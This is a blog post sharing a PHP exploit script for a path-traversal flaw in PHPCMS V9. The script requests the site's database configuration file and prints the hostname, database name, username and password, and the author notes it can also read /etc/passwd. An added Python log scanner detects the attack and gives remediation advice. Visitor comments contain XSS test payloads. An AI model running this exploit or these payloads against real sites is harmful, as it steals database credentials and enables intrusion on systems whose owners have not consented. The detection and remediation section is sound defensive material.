
PHPCMS V9 database password reading EXP


This vulnerability was disclosed on WooYun ages ago; see http://www.wooyun.org/bugs/wooyun-2012-010072 for the details. I have been learning PHP lately, just so I can write a few small tools to play with, so I picked this simplest of vulnerabilities to practise on. I hope you brothers will support me!!!

In fact, this vulnerability can also be used to read files such as /etc/passwd; you brothers can improvise freely. As a newbie I can only write something that reads the database password, so please don't look down on me.

The code is below; save it as *.php and run it.

<?php
/**
 * Created by 独自等待
 * User: Hack2012
 * Date: 13-2-4 23:32
 * FileName: PHPCMSV9_DB.php
 * 独自等待's blog: www.waitalone.cn
 */
print_r('
+------------------------------------------------------+
             PHPCMS_V9  数据库密码读取 EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                   Time:2013-02-06
+------------------------------------------------------+
');
// Both command-line arguments are required: the target host and the path to phpcms.
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path to phpcms
Example: php ' . $argv[0] . ' localhost /phpcms/
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7); // E_ERROR | E_WARNING | E_PARSE
$host = $argv[1];
$path = $argv[2];
// The search module's public_get_suggest_keyword action uses the q parameter as a
// file path without any traversal check, so "../../caches/configs/database.php"
// returns the site's database configuration file.
$url = '/index.php?m=search&a=public_get_suggest_keyword&url=abc&q=../../caches/configs/database.php';
//echo payload($url);
$content = payload($url);
// The request only counts as a hit if the returned body mentions "database".
if (preg_match('/database/', $content)) {
    // Collect every 'key' => 'value' pair. This assumes the values consist of word
    // characters only and appear in the order hostname, database, username,
    // password, tablepre; a value containing punctuation is skipped, which
    // shifts the indexes below.
    if (preg_match_all('/\'(\w+)\' => \'(\w+)\'/', $content, $result)) {
        //print_r($result);
        echo '主机名:' . $result[2][0] . "\n";
        echo '数据库:' . $result[2][1] . "\n";
        echo '用户名:' . $result[2][2] . "\n";
        echo '密  码:' . $result[2][3] . "\n";
        echo '表前缀:' . $result[2][4] . "\n";
    }
} else {
    echo '网站不存在此漏洞';
}
// Send one raw HTTP/1.1 GET for $url under $path and return the whole response
// (status line, headers and body) as a string.
function payload($url)
{
    global $host, $path;
    // rtrim avoids a doubled slash when the path is given with a trailing "/".
    $data = "GET " . rtrim($path, '/') . $url . " HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = @fsockopen($host, 80);
    if (!$fp) {
        die('Connect to host Error');
    }
    fwrite($fp, $data);
    $back = '';
    // Read until the server closes the connection (Connection: Close above).
    while (!feof($fp)) {
        $back .= fread($fp, 1024);
    }
    fclose($fp);
    return $back;
}

?>
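For anyone running PHPCMS V9 who wants to know whether this request has been aimed at their site, the following is an added detection example (mine, not code from the post or from the PHPCMS project). It parses common-log-format access-log lines, restricts itself to the `m=search&a=public_get_suggest_keyword` action the exploit uses, decodes the `q` parameter (including double percent-encoding and backslash variants) and flags traversal sequences and the two file names mentioned on this page. The log lines at the bottom are constructed and use documentation IP ranges.

```python
"""Flag access-log entries that hit the PHPCMS V9 suggest-keyword action with a
path-traversal payload in q. Added example, not from the original post; the
sample log lines below are constructed, not captured traffic."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Files the page says this traversal is used to read.
SENSITIVE_FILES = ("caches/configs/database.php", "etc/passwd")


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads unwrap too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_target(target):
    """Return the sorted reasons a request target looks like the traversal, [] if benign."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes once
    modules = {fully_decode(v).lower() for v in params.get("m", [])}
    actions = {fully_decode(v).lower() for v in params.get("a", [])}
    # Only the search module's public_get_suggest_keyword action is in scope.
    if "search" not in modules or "public_get_suggest_keyword" not in actions:
        return []
    reasons = set()
    for raw_q in params.get("q", []):
        # Normalise backslashes so a Windows-style "..\" is caught as well.
        q = fully_decode(raw_q).replace("\\", "/").lower()
        if re.search(r"(^|/)\.\.(/|$)", q):
            reasons.add("traversal")
        if any(name in q for name in SENSITIVE_FILES):
            reasons.add("sensitive_file")
    return sorted(reasons)


def scan_log(lines):
    """Return one finding per suspicious line; status 200 means the file was likely served."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        reasons = analyse_target(m.group("target"))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "reasons": reasons,
                "target": m.group("target"),
            })
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Feb/2013:10:00:01 +0800] "GET /phpcms/index.php?m=search&a=public_get_suggest_keyword&url=abc&q=phpcms HTTP/1.1" 200 128',
    '203.0.113.5 - - [06/Feb/2013:10:00:02 +0800] "GET /phpcms/index.php?m=search&a=public_get_suggest_keyword&url=abc&q=../../caches/configs/database.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [06/Feb/2013:10:00:03 +0800] "GET /phpcms/index.php?m=search&a=public_get_suggest_keyword&url=abc&q=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '198.51.100.9 - - [06/Feb/2013:10:00:04 +0800] "GET /phpcms/index.php?m=search&a=public_get_suggest_keyword&url=abc&q=%252e%252e%252fcaches%252fconfigs%252fdatabase.php HTTP/1.1" 200 512',
    '192.0.2.7 - - [06/Feb/2013:10:00:05 +0800] "GET /phpcms/index.php?m=content&a=show&catid=6&id=../../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file's lines. A traversal hit that returned 200 with a non-trivial size is the one to treat as a likely leak of `caches/configs/database.php`, which means rotating the database credentials, not just patching. The fix on the server side is the usual one for this class of bug: reject any `q` value containing a path separator or `..` before it reaches a file operation, or resolve it and check that the real path stays inside the intended directory.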

phpcms database password read

Currently: 3 visitor comments, 2 blogger replies

  1. Master
    2013-05-20 16:23

    良子木JJ, I came to see you.
    Alert(/x/) [/可爱]

  2. Master
    2013-05-21 16:19

    Pop tantantan%3Cscript%3Ealert%28/xss/%29%3C%2Fscript%3E

  3. aNsSe
    2014-11-22 09:00

    Brother 独自, your little brother came to see you.
